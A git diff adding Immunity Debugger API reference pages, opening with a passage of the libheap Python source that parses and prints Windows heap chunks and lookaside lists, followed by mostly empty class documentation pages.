599 raise Exception , "Failed to read chunk at address: 0x%08x" % addr
+
600
+
601 self . _get ( dword1 , dword2 , addr )
+
602
+
603
+
604 - def _get ( self , size , flags , addr ) :
+
605 self . size = size & 0xffff
+
606 self . usize = self . size * 8
+
607
+
608 self . psize = ( size >> 16 ) & 0xffff
+
609 self . upsize = self . psize * 8
+
610
+
611 self . field4 = flags & 0xff
+
612 self . flags = ( flags >> 8 ) & 0xff
+
613 self . other = ( flags >> 16 ) & 0xffff
+
614 mem_addr = addr + 8
+
615 if not ( self . flags & self . BUSY [ 1 ] [ 1 ] ) :
+
616 if self . flags & self . FLAGS [ 'VIRTUAL ALLOC' ] [ 1 ] :
+
617 pass
+
618 else :
+
619 try :
+
620 self . nextchunk = self . imm . readLong ( addr + 8 )
+
621 self . prevchunk = self . imm . readLong ( addr + 12 )
+
622 except WindowsError :
+
623 raise Exception , "Failed to read chunk at address: 0x%08x" % addr
+
624
+
625 mem_addr += 8
+
626
+
627 self . data_addr = mem_addr
+
628 self . data_size = self . upsize - ( addr - mem_addr )
+
629
+
630 try :
+
631 self . sample = self . imm . readMemory ( self . data_addr , 0x10 )
+
632 except WindowsError :
+
633 raise Exception , "Failed to read chunk at address: 0x%08x" % addr
+
634
+
635 self . properties = { 'size' : self . usize , 'prevsize' : self . upsize , 'field4' : self . field4 , \
+
636 'flags' : self . flags , 'other' : self . other , 'address' : self . addr , \
+
637 'next' : self . nextchunk , 'prev' : self . prevchunk }
+
638
+
640 self . restored = True
+
641
+
643 return self . restored
+
644
+
645 - def get ( self , what ) :
+
646 try :
+
647 return self . properties [ string . lower ( what ) ]
+
648 except KeyError :
+
649 return None
+
650
+
651 - def printchunk ( self , uselog = None , option = 0 , dt = None ) :
+
652 ret = [ ]
+
653 if self . isRestore ( ) :
+
654 restore = "<R>"
+
655 else :
+
656 restore = ""
+
657 ret . append ( ( self . addr , "0x%08x> " % self . addr + "size: 0x%08x (%04x) prevsize: 0x%08x (%04x) %s" % ( self . usize , self . size , \
+
658 self . upsize , self . psize , restore ) ) )
+
659 ret . append ( ( self . addr , " heap: *0x%08x* flags: 0x%08x (%s)" % ( self . heap_addr , self . flags , \
+
660 self . getflags ( self . flags ) ) ) )
+
661
+
662
+
663 if not ( self . flags & self . BUSY [ 1 ] [ 1 ] ) :
+
664 ret . append ( ( self . addr , " next: 0x%08x prev: 0x%08x" % ( self . nextchunk , self . prevchunk ) ) )
+
665 if option & SHOWCHUNK_FULL :
+
666 dump = immutils . hexdump ( self . sample )
+
667 for a in range ( 0 , len ( dump ) ) :
+
668 if not a :
+
669 ret . append ( ( self . addr , " (%s %s)" % ( dump [ a ] [ 0 ] , dump [ a ] [ 1 ] ) ) )
+
670 if dt :
+
671 result = dt . Discover ( self . imm . readMemory ( self . data_addr , self . data_size ) , self . data_addr )
+
672
+
673 for obj in result :
+
674 msg = obj . Print ( )
+
675 ret . append ( ( obj . address , " > %s: %s " % ( obj . name , msg ) ) )
+
676
+
677
+
678 if uselog :
+
679 for adr , msg in ret :
+
680 uselog ( msg , address = adr )
+
681
+
682 return ret
+
683
+
685 f = ""
+
686 if self . flags & self . BUSY [ 1 ] [ 1 ] :
+
687 f += self . BUSY [ 1 ] [ 0 ]
+
688 else :
+
689 f += "F"
+
690
+
691 for a in self . FLAGS . keys ( ) :
+
692 if self . FLAGS [ a ] [ 1 ] & self . flags :
+
693 f += "|" + self . FLAGS [ a ] [ 0 ]
+
694 return f
+
695
+
697 if self . flags & self . FLAGS [ 'TOP' ] [ 1 ] :
+
698 return 1
+
699 return 0
+
700
+
702 if self . psize == 0 :
+
703 return 1
+
704 return 0
+
705
+706
+
708 FLAGS = { 'FILL PATTERN' : ( 'FP' , 0x4 ) , 'DEBUG' : ( 'D' , 0x8 ) , \
+
709 'TOP' : ( 'T' , 0x10 ) , 'FFU1' : ( 'FFU1' , 0x20 ) , \
+
710 'FFU2' : ( 'FFU2' , 0x40 ) , 'NO COALESCE' : ( 'NC' , 0x80 ) }
+
711 LFHMASK = 0x3F
+
712 LFHFLAGS = { 'TOP' : ( 'T' , 0x3 ) , 'BUSY' : ( 'B' , 0x18 ) }
+
713
+
714 - def __init__ ( self , imm , addr , heap = None , BlockSize = 0 ) :
+
715 self . heap = heap
+
716 self . freeorder = - 1
+
717 self . isLFH = False
+
718 if BlockSize :
+
719 self . isLFH = True
+
720 self . size = BlockSize
+
721 win32heapchunk . __init__ ( self , imm , addr , heap )
+
722
+
724 self . freeorder = freeorder
+
725
+
726 - def _get ( self , dword1 , dword2 , addr ) :
+
727 heap = self . heap
+
728 self . nextchunk = 0
+
729 self . prevchunk = 0
+
730 if heap and heap . EncodeFlagMask :
+
731 dword1 ^= heap . EncodingKey
+
732 dword2 = dword2 ^ heap . EncodingKey2
+
733
+
734 self . subsegmentcode = self . SubSegmentCode = dword1
+
735 if self . isLFH :
+
736 self . upsize = self . usize = self . size << 3
+
737 self . psize = self . size
+
738 else :
+
739 self . size = dword1 & 0xffff
+
740 self . usize = self . size << 3
+
741 self . psize = dword2 & 0xffff
+
742 self . upsize = self . psize << 3
+
743
+
744 self . flags = ( dword1 >> 16 & 0xff )
+
745 self . smalltagindex = ( dword1 >> 24 & 0xff )
+
746
+
747 self . segmentoffset = ( dword2 >> 16 & 0xff )
+
748 self . unused = ( dword2 >> 24 & 0xff )
+
749 self . flags2 = self . unused
+
750 self . lfhflags = self . flags2
+
751
+
752
+
753 self . data_addr = addr + 8
+
754
+
755 self . properties = { 'size' : self . usize , 'prevsize' : self . upsize , 'smalltagindex' : self . smalltagindex , \
+
756 'flags' : self . flags , 'subsegmentcode' : self . subsegmentcode , 'address' : self . addr , \
+
757 'next' : self . nextchunk , 'prev' : self . prevchunk , 'lfhflags' : self . flags2 , \
+
758 'segmentoffset' : self . segmentoffset }
+
759 self . data_size = self . usize - ( self . addr - self . data_addr )
+
760
+
761 try :
+
762 self . sample = self . imm . readMemory ( self . data_addr , 0x10 )
+
763 except WindowsError :
+
764 raise Exception , "Failed to read chunk at address: 0x%08x" % addr
+
765
+
767 f = ""
+
768 if not self . isLFH :
+
769 if self . flags & self . BUSY [ 1 ] [ 1 ] :
+
770 f += self . BUSY [ 1 ] [ 0 ]
+
771 else :
+
772 f += "F"
+
773
+
774 for a in self . FLAGS . keys ( ) :
+
775 if self . FLAGS [ a ] [ 1 ] & self . flags :
+
776 f += "|" + self . FLAGS [ a ] [ 0 ]
+
777 else :
+
778 for k in self . LFHFLAGS . keys ( ) :
+
779 if self . flags2 == self . LFHFLAGS [ k ] [ 1 ] :
+
780 return self . LFHFLAGS [ k ] [ 0 ]
+
781 return f
+
782
+
784 if self . flags2 == self . LFHFLAGS [ 'TOP' ] [ 1 ] :
+
785 return 1
+
786 else :
+
787 return 0
+
788
+
789 - def printchunk ( self , uselog = None , option = 0 , dt = None ) :
+
790 ret = [ ]
+
791 if self . isRestore ( ) :
+
792 restore = "<R>"
+
793 else :
+
794 restore = ""
+
795 if self . isLFH :
+
796 s = "B"
+
797 if self . freeorder != - 1 :
+
798 s = "F(%02x)" % self . freeorder
+
799 ret . append ( ( self . addr , "Chunk size: 0x%x lfhflag: 0x%x %s" % ( self . psize , self . lfhflags , s ) ) )
+
800 else :
+
801 ret . append ( ( self . addr , "0x%08x> " % self . addr + "size: 0x%08x (%04x) prevsize: 0x%08x (%04x) %s" % ( self . usize , self . size , \
+
802 self . upsize , self . psize , restore ) ) )
+
803 ret . append ( ( self . addr , " heap: *0x%08x* flags: 0x%02x 0x%02x (%s)" % ( self . heap_addr , self . flags , self . flags2 , \
+
804 self . getflags ( self . flags ) ) ) )
+
805 if not self . isLFH and not ( self . flags2 & self . BUSY [ 1 ] [ 1 ] ) :
+
806 ret . append ( ( self . addr , " next: 0x%08x prev: 0x%08x" % ( self . nextchunk , self . prevchunk ) ) )
+
807 if option & SHOWCHUNK_FULL :
+
808 dump = immutils . hexdump ( self . sample )
+
809 for a in range ( 0 , len ( dump ) ) :
+
810 if not a :
+
811 ret . append ( ( self . addr , " (%s %s)" % ( dump [ a ] [ 0 ] , dump [ a ] [ 1 ] ) ) )
+
812 if dt :
+
813 if not self . isLFH or ( self . isLFH and self . freeorder == - 1 ) :
+
814 result = dt . Discover ( self . imm . readMemory ( self . data_addr , self . data_size ) , self . data_addr )
+
815 for obj in result :
+
816 msg = obj . Print ( )
+
817 ret . append ( ( obj . address , " > %s: %s " % ( obj . name , msg ) ) )
+
818
+
819 if uselog :
+
820 for adr , msg in ret :
+
821 uselog ( msg , address = adr )
+
822
+
823 return ret
+
824
+825
+
827 - def __init__ ( self , imm , addr , heap = 0x0 , log = None ) :
+
828 """ Win32 Heap Lookaside list """
+
829 UserList . __init__ ( self )
+
830 if not log :
+
831 log = imm . Log
+
832 self . log = log
+
833 self . imm = imm
+
834 self . heap = heap
+
835 self . Lookaside = [ ]
+
836
+
837 LookSize = PLook ( self . imm , 0x0 ) . getSize ( )
+
838 mem = imm . readMemory ( addr , LookSize * HEAP_MAX_FREELIST )
+
839
+
840 for ndx in range ( 0 , HEAP_MAX_FREELIST ) :
+
841 base_addr = addr + ndx * LookSize
+
842 l = PLook ( self . imm , base_addr , mem [ ndx * LookSize : ndx * LookSize + LookSize ] , self . heap )
+
843
+
844 self . data . append ( l )
+
845 next = l . ListHead
+
846 while next and next != base_addr :
+
847 l . append ( next )
+
848 try :
+
849 next = self . imm . readLong ( next )
+
850 except :
+
851 break
+
852
+853
+
855 - def __init__ ( self , imm , addr , data = None , heap = 0x0 , log = None ) :
+
856 self . log = log
+
857 self . addr = addr
+
858 self . List = [ ]
+
859 self . fmt = "LLHHLLLLLL12s"
+
860 self . imm = imm
+
861 self . heap = heap
+
862
+
863
+
864 if data :
+
865 ( self . ListHead , none , self . Depth , self . MaxDepth , self . TotalAlloc , self . AllocMiss , self . TotalFrees ,
+
866 self . FreeMiss , self . AllocLastTotal , self . LastAllocateMiss , self . Unknown ) = \
+
867 struct . unpack ( self . fmt , data [ : struct . calcsize ( self . fmt ) ] )
+
868 elif addr :
+
869 data = self . imm . readMemory ( addr , self . getSize ( ) )
+
870 ( self . ListHead , none , self . Depth , self . MaxDepth , self . TotalAlloc , self . AllocMiss , self . TotalFrees ,
+
871 self . FreeMiss , self . AllocLastTotal , self . LastAllocateMiss , self . Unknown1 , self . Unknown2 ) = \
+
872 struct . unpack ( self . fmt , data [ : struct . calcsize ( self . fmt ) ] )
+
873
+
875 return self . ListHead == 0x0
+
876
+
878 return struct . calcsize ( self . fmt )
+
879
+
881 self . List . append ( andres )
+
882
+
884 """get a the single linked list of the Lookaside entry
+
885 @return: A list of the address of the linked list"""
+
886 return self . List
+
887
+
889 """get a the single linked list of the Lookaside entry
+
890 @return: A list of the Chunks on the linked list"""
+
891
+
892 chunks = [ ]
+
893 for addr in self . List :
+
894
+
895
+
896 chunks . append ( win32heapchunk ( self . imm , addr - 8 , self . heap ) )
+
897
+
898 return chunks
+
899
+
901 - def __init__ ( self , imm , what , action , value , heap = 0x0 , restore = False , option = 0 ) :
+
902 """
+
903 Search the Heap for specific Chunks
+
904
+
905 @type imm: Debugger Object
+
906 @param imm: Initialized debugged object
+
907
+
908 @type what: STRING
+
909 @param what: Chunk property to search from (size, prevsize, field4, flags, other, address, next, prev)
+
910
+
911 @type action: STRING
+
912 @param action: Type of search ( =, >, <, >=, <=, &, not, !=)
+
913
+
914 @type value: DWORD
+
915 @param value: Value to search for
+
916
+
917 @type heap: DWORD
+
918 @param heap: (Optional, Def=None) Filter by Heap
+
919
+
920 @type restore: BOOLEAN
+
921 @param restore: (Optional, Def: False) Flag whether or not use a restore heap (Useful if you want to search on a broken heap)
+
922
+
923 @type option: DWORD
+
924 @param option: (Optional, Def: None) Chunk's display option
+
925 """
+
926 self . functions = { '=' : lambda a , b : a == b ,
+
927 '>' : lambda a , b : a > b ,
+
928 '<' : lambda a , b : a < b ,
+
929 '>=' : lambda a , b : a >= b ,
+
930 '<=' : lambda a , b : a <= b ,
+
931 '&' : lambda a , b : a & b ,
+
932 'not' : lambda a , b : a & ~ b ,
+
933
+
934 '!=' : lambda a , b : a != b
+
935 }
+
936 for a in imm . getHeapsAddress ( ) :
+
937 if a == heap or not heap :
+
938
+
939 p = imm . getHeap ( a , restore )
+
940 if not what or not action :
+
941 for c in p . chunks :
+
942 c . printchunk ( uselog = imm . Log , option = option )
+
943 else :
+
944 for c in p . chunks :
+
945 if self . functions [ action ] ( c . get ( what ) , value ) :
+
946 c . printchunk ( uselog = imm . Log , option = option )
+
947
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.Blocks-class.html b/1.73/Documentation/Ref/Libs.libheap.Blocks-class.html
new file mode 100755
index 0000000..649eca8
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.Blocks-class.html
@@ -0,0 +1,179 @@
+
+
+
+
+ Libs.libheap.Blocks
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class Blocks
+
+
+
+
+
+
+
+
+Class Blocks source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ setFreeListInUse (self ,
+ inuse )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.Bucket-class.html b/1.73/Documentation/Ref/Libs.libheap.Bucket-class.html
new file mode 100755
index 0000000..2b893f8
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.Bucket-class.html
@@ -0,0 +1,145 @@
+
+
+
+
+ Libs.libheap.Bucket
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class Bucket
+
+
+
+
+
+
+
+
+Class Bucket source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ addr ,
+ mem )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.LFHeap-class.html b/1.73/Documentation/Ref/Libs.libheap.LFHeap-class.html
new file mode 100755
index 0000000..d20a059
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.LFHeap-class.html
@@ -0,0 +1,145 @@
+
+
+
+
+ Libs.libheap.LFHeap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class LFHeap
+
+
+
+
+
+
+
+
+Class LFHeap source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.LocalData-class.html b/1.73/Documentation/Ref/Libs.libheap.LocalData-class.html
new file mode 100755
index 0000000..3ef9f5b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.LocalData-class.html
@@ -0,0 +1,145 @@
+
+
+
+
+ Libs.libheap.LocalData
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class LocalData
+
+
+
+
+
+
+
+
+Class LocalData source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.LocalSegmentInfo-class.html b/1.73/Documentation/Ref/Libs.libheap.LocalSegmentInfo-class.html
new file mode 100755
index 0000000..94a8256
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.LocalSegmentInfo-class.html
@@ -0,0 +1,164 @@
+
+
+
+
+ Libs.libheap.LocalSegmentInfo
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class LocalSegmentInfo
+
+
+
+
+
+
+
+
+Class LocalSegmentInfo source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ mem =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getSubSegment (self ,
+ address ,
+ type =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.PHeap-class.html b/1.73/Documentation/Ref/Libs.libheap.PHeap-class.html
new file mode 100755
index 0000000..5ca6017
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.PHeap-class.html
@@ -0,0 +1,427 @@
+
+
+
+
+ Libs.libheap.PHeap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class PHeap
+
+
+
+
+
+
+
+
+Class PHeap source code
+Known Subclasses:
+
+
+
+
+
+
+ PHEAP object
+
+
+
+ __init__ (self ,
+ imm ,
+ heapddr =0 ,
+ restore =False )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ List of win32heapchunks
+
+
+
+
+
+
+
+ win32heapchunks
+
+
+
+
+
+
+
+ List of win32heapchunks
+
+
+
+ getChunks (self ,
+ address ,
+ size =4294967295 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ printFreeListInUse (self ,
+ uselog =None ) source code
+
+ Print the Heap's FreeListInUse bitmask
+
+ Parameters:
+
+ uselog
+
+
+
+
+
+
+ printFreeList (self ,
+ uselog =None ) source code
+
+ Print the Heap's FreeList
+
+ Parameters:
+
+ uselog
+
+
+
+
+
+
+ getRestoredChunks (self ,
+ address ) source code
+
+ Enumerate Chunks of the current heap using a restore heap
+
+ Parameters:
+
+ address Returns: List of win32heapchunks
+ Chunks
+
+
+
+
+
+
+
+ findChunkByAddress (self ,
+ addr ) source code
+
+ Find a Chunks by its address
+
+ Parameters:
+
+ address Returns: win32heapchunks
+ Chunk
+
+
+
+
+
+
+
+ getChunks (self ,
+ address ,
+ size =4294967295 ) source code
+
+ Enumerate Chunks of the current heap
+
+ Parameters:
+
+ addresssize Returns: List of win32heapchunks
+ Chunks
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.PHeapLookaside-class.html b/1.73/Documentation/Ref/Libs.libheap.PHeapLookaside-class.html
new file mode 100755
index 0000000..78bf936
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.PHeapLookaside-class.html
@@ -0,0 +1,238 @@
+
+
+
+
+ Libs.libheap.PHeapLookaside
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class PHeapLookaside
+
+
+
+
+
+
+
+
+Class PHeapLookaside source code
+
+UserList.UserList --+
+ |
+ PHeapLookaside
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ heap =0 ,
+ log =None )
+ source code
+
+
+
+
+
+
+
+ Inherited from UserList.UserList :
+ __add__,
+ __cmp__,
+ __contains__,
+ __delitem__,
+ __delslice__,
+ __eq__,
+ __ge__,
+ __getitem__,
+ __getslice__,
+ __gt__,
+ __iadd__,
+ __imul__,
+ __le__,
+ __len__,
+ __lt__,
+ __mul__,
+ __ne__,
+ __radd__,
+ __repr__,
+ __rmul__,
+ __setitem__,
+ __setslice__,
+ append,
+ count,
+ extend,
+ index,
+ insert,
+ pop,
+ remove,
+ reverse,
+ sort
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ heap =0 ,
+ log =None )(Constructor)
+ source code
+
+ Win32 Heap Lookaside list
+
+ Overrides:
+ UserList.UserList.__init__
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.PLook-class.html b/1.73/Documentation/Ref/Libs.libheap.PLook-class.html
new file mode 100755
index 0000000..5a10256
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.PLook-class.html
@@ -0,0 +1,292 @@
+
+
+
+
+ Libs.libheap.PLook
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class PLook
+
+
+
+
+
+
+
+
+Class PLook source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ data =None ,
+ heap =0 ,
+ log =None )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ getList (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ get a the single linked list of the Lookaside entry
+
+ Returns:
+ A list of the address of the linked list
+
+
+
+
+
+
+
+ get a the single linked list of the Lookaside entry
+
+ Returns:
+ A list of the Chunks on the linked list
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.SearchHeap-class.html b/1.73/Documentation/Ref/Libs.libheap.SearchHeap-class.html
new file mode 100755
index 0000000..75dadab
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.SearchHeap-class.html
@@ -0,0 +1,209 @@
+
+
+
+
+ Libs.libheap.SearchHeap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class SearchHeap
+
+
+
+
+
+
+
+
+Class SearchHeap source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ what ,
+ action ,
+ value ,
+ heap =0 ,
+ restore =False ,
+ option =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ what ,
+ action ,
+ value ,
+ heap =0 ,
+ restore =False ,
+ option =0 )(Constructor)
+ source code
+
+ Search the Heap for specific Chunks
+
+ Parameters:
+
+ immwhatactionvalueheaprestoreoption
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.Segment-class.html b/1.73/Documentation/Ref/Libs.libheap.Segment-class.html
new file mode 100755
index 0000000..647424b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.Segment-class.html
@@ -0,0 +1,145 @@
+
+
+
+
+ Libs.libheap.Segment
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class Segment
+
+
+
+
+
+
+
+
+Class Segment source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.SubSegment-class.html b/1.73/Documentation/Ref/Libs.libheap.SubSegment-class.html
new file mode 100755
index 0000000..f5bb92d
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.SubSegment-class.html
@@ -0,0 +1,203 @@
+
+
+
+
+ Libs.libheap.SubSegment
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class SubSegment
+
+
+
+
+
+
+
+
+Class SubSegment source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ address ,
+ type =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ grabBusyList (self ,
+ imm ,
+ base_addr ,
+ offset ,
+ depth )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getUserData (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getChunks (self ,
+ imm ,
+ address ,
+ list )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.UserData-class.html b/1.73/Documentation/Ref/Libs.libheap.UserData-class.html
new file mode 100755
index 0000000..9d24ce0
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.UserData-class.html
@@ -0,0 +1,161 @@
+
+
+
+
+ Libs.libheap.UserData
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class UserData
+
+
+
+
+
+
+
+
+Class UserData source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.UserMemoryCache-class.html b/1.73/Documentation/Ref/Libs.libheap.UserMemoryCache-class.html
new file mode 100755
index 0000000..2dd438f
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.UserMemoryCache-class.html
@@ -0,0 +1,145 @@
+
+
+
+
+ Libs.libheap.UserMemoryCache
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class UserMemoryCache
+
+
+
+
+
+
+
+
+Class UserMemoryCache source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ addr ,
+ mem )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.VistaPHeap-class.html b/1.73/Documentation/Ref/Libs.libheap.VistaPHeap-class.html
new file mode 100755
index 0000000..14b3bf9
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.VistaPHeap-class.html
@@ -0,0 +1,352 @@
+
+
+
+
+ Libs.libheap.VistaPHeap
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class VistaPHeap
+
+
+
+
+
+
+
+
+Class VistaPHeap source code
+
+PHeap --+
+ |
+ VistaPHeap
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ heapddr =0 ,
+ restore =False )(Constructor)
+ source code
+
+ Windows 32 Heap Class
+
+ Returns: PHEAP object
+ Overrides:
+ PHeap.__init__
+ (inherited documentation)
+
+
+
+
+
+
+ printFreeList (self ,
+ uselog =None ) source code
+
+ Print the Heap's FreeList
+
+ Parameters:
+
+ uselog Overrides:
+ PHeap.printFreeList
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libheap.win32heapchunk-class.html b/1.73/Documentation/Ref/Libs.libheap.win32heapchunk-class.html
new file mode 100755
index 0000000..74785c4
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libheap.win32heapchunk-class.html
@@ -0,0 +1,371 @@
+
+
+
+
+ Libs.libheap.win32heapchunk
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libheap ::
+ Class win32heapchunk
+
+
+
+
+
+
+
+
+Class win32heapchunk source code
+Known Subclasses:
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ addr ,
+ heap =None )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ _get (self ,
+ size ,
+ flags ,
+ addr )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ printchunk (self ,
+ uselog =None ,
+ option =0 ,
+ dt =None )
